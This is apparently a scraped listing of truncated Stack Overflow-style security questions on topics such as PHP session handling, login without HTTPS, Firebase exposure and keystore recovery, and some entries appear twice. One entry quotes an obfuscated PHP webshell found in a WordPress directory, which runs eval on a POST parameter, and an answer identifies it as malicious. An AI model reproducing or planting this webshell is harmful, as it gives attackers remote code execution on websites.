security

问题 Currently when user logged in, i created 2 sessions. $_SESSION['logged_in'] = 1; $_SESSION['username'] = $username; // user's name So that, those page which requires logged in, i just do this: if(isset($_SESSION['logged_id'])){ // Do whatever I want } Is there any security loopholes? I mean, is it easy to hack my session? How does people hack session? and how do I prevent it?? EDIT: Just found this: http://www.xrvel.com/post/353/programming/make-a-secure-session-login-script http://net

问题 For a webapplication, when HTTPS is not available as a security measure, is it possible to still make the login somewhat secure? E.g.: Tokenize logins, to make repeat attacks difficult? Somehow encrypt the sent password from a HTML password field? In particular I'm using CakePHP and an AJAX POST call to trigger authentication (includes provided username and password). Update on the problem: HTTPS is not available. Period. If you don't like the the situation, consider it a theoretical question

问题 Firebase provides database back-end so that developers can focus on the client side code. So if someone takes my firebase uri (for example, https://firebaseinstance.firebaseio.com ) then develop on it locally . Then, would they be able to create another app off my Firebase instance, signup and authenticate themselves to read all data of my Firebase app? 回答1: @Frank van Puffelen, You mentioned the phishing attack. There actually is a way to secure for that. If you login to your googleAPIs API

问题 I found a suspicious PHP file /wp-includes/mera.php Content: <?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?> Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious? 回答1: Delete the file instantly! This PHP code is a modified webshell. Those could be used to atack other websites and could lead to serious legal problems! After

问题 We are writing a set of application for windows which contains IE toolbar, Firefox toolbar and Windows Desktop client. Before using any of these components user provides his secret code and says that he need to save this code for 1hr or whatever option he chooses. Now the challenge for us is that we have to use the same secret code to decrypt his data while he uses in all 3 component, Currently we are writing that secret key in a plain file with AES encryption with a specific key buried in

问题 We are writing a set of application for windows which contains IE toolbar, Firefox toolbar and Windows Desktop client. Before using any of these components user provides his secret code and says that he need to save this code for 1hr or whatever option he chooses. Now the challenge for us is that we have to use the same secret code to decrypt his data while he uses in all 3 component, Currently we are writing that secret key in a plain file with AES encryption with a specific key buried in

问题 I have already uploaded an app in play store. I am using android studio 3 for building my application. Android - Forgot keystore password. Can I decrypt keystore file? @varun answer i tried all the three scenarios But not able to get the solution if any other way to recover the password please let me know Point to discuss 1.When i searched for Pandroid.injected.signing.key.password this key in idea.log.1 i get as encrypted password. Pandroid.injected.signing.key.password=*********, 2.my key

问题 I have already uploaded an app in play store. I am using android studio 3 for building my application. Android - Forgot keystore password. Can I decrypt keystore file? @varun answer i tried all the three scenarios But not able to get the solution if any other way to recover the password please let me know Point to discuss 1.When i searched for Pandroid.injected.signing.key.password this key in idea.log.1 i get as encrypted password. Pandroid.injected.signing.key.password=*********, 2.my key

问题 Closed. This question is off-topic. It is not currently accepting answers. Want to improve this question? Update the question so it's on-topic for Stack Overflow. Closed 5 years ago . Is this code good proteceted, and if not could you tell me how to secure that. I use Mysqli...Also I would like to someone show me how this can be exploited if it is not secure? if(isset($_POST['vrsta_predmeta']) AND !empty($_POST['vrsta_predmeta']) AND isset($_POST['res_text']) AND isset($_POST['glavni_dug'])

问题 This question already has answers here : Detect HTTP or HTTPS then force HTTPS in JavaScript (12 answers) Closed 2 years ago . I want to redirect users from my http website to https site is there like a meta or Javascript or html to do this my site has a http server as well as a secure version,any help would be appreciated! 回答1: As a quick-fix you can do it like this: if(window.location.protocol != 'https:') { location.href = location.href.replace("http://", "https://"); } But I recommend you